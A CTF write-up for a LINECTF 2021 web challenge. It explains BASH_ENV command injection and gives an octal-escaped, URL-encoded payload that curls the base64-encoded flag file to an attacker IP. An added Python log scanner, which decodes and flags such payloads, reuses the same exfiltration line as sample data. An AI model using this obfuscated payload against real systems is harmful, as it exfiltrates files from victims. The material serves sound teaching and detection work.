LINECTF 2021 - Web
Writeup by Payload as Super HexaGoN
We can inject a bash command line through the environment variable BASH_ENV. For example, with `BASH_ENV=touch /tmp`, /bin/bash will execute touch.
This is like the 34C3 CTF challenge: we can call cat as `$'\143\141\164'` (bash's ANSI-C quoting, which expands octal escapes).
Thus, the final payload is:
`$%27\143\165\162\154%27%20111.111.111.111:40010/$($%27\143\141\164%27%20$%27\57\146\154\141\147%27%20|%20$%27\142\141\163\145\66\64%27)`
Replace 111.111.111.111 with the attacker's IP.
LINECTF{well..what_do_you_think_about}
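Added example, not part of the original writeup: a Python normalizer a defender can run over request logs to undo the URL encoding and expand bash ANSI-C `$'\NNN'` tokens, so obfuscated command lines like the one above read as plain text and BASH_ENV injection attempts are flagged. The log format and lines are constructed; the third line reuses the payload from this writeup.

```python
import re
from urllib.parse import unquote
# Bash ANSI-C quoted string $'...' (backslash escapes allowed inside).
ANSI_C_QUOTE = re.compile(r"\$'((?:\\.|[^'\\])*)'")
# Escapes expanded inside $'...': \NNN octal, \xHH hex, and a few named ones.
ESCAPE = re.compile(r"\\([0-7]{1,3}|x[0-9A-Fa-f]{1,2}|[nt\\'\"])")
NAMED = {"n": "\n", "t": "\t", "\\": "\\", "'": "'", '"': '"'}

def decode_ansi_c(body):
    """Expand the escapes of one $'...' body the way bash does."""
    def one(m):
        esc = m.group(1)
        if esc.startswith("x"):
            return chr(int(esc[1:], 16))
        if esc[0] in "01234567":
            return chr(int(esc, 8) & 0xFF)  # bash keeps only the low byte
        return NAMED[esc]
    return ESCAPE.sub(one, body)

def normalize_command(cmdline):
    """URL-decode, then expand every $'...' token; return (plain, count)."""
    expanded = 0
    def repl(m):
        nonlocal expanded
        expanded += 1
        return decode_ansi_c(m.group(1))
    plain = ANSI_C_QUOTE.sub(repl, unquote(cmdline))
    return plain, expanded

def scan_log(lines):
    """Flag lines that set BASH_ENV or hide commands behind ANSI-C quoting.
    Returns a list of (line_no, reason, normalized_line)."""
    findings = []
    for no, line in enumerate(lines, 1):
        plain, expanded = normalize_command(line)
        if "BASH_ENV=" in plain:
            findings.append((no, "BASH_ENV set in request", plain))
        elif expanded:
            findings.append((no, f"{expanded} ANSI-C quoted token(s)", plain))
    return findings

# Constructed sample request log; the third line reuses the writeup's payload.
SAMPLE_LOG = [
    "GET /run?cmd=ls%20-la HTTP/1.1",
    "POST /env body=BASH_ENV=touch%20/tmp/x HTTP/1.1",
    r"GET /run?cmd=$%27\143\165\162\154%27%20111.111.111.111:40010/"
    r"$($%27\143\141\164%27%20$%27\57\146\154\141\147%27%20|%20"
    r"$%27\142\141\163\145\66\64%27) HTTP/1.1",
]
```

Running `scan_log(SAMPLE_LOG)` reports line 2 for the BASH_ENV assignment and line 3 with its four expanded tokens, showing the plain command that the octal escapes concealed.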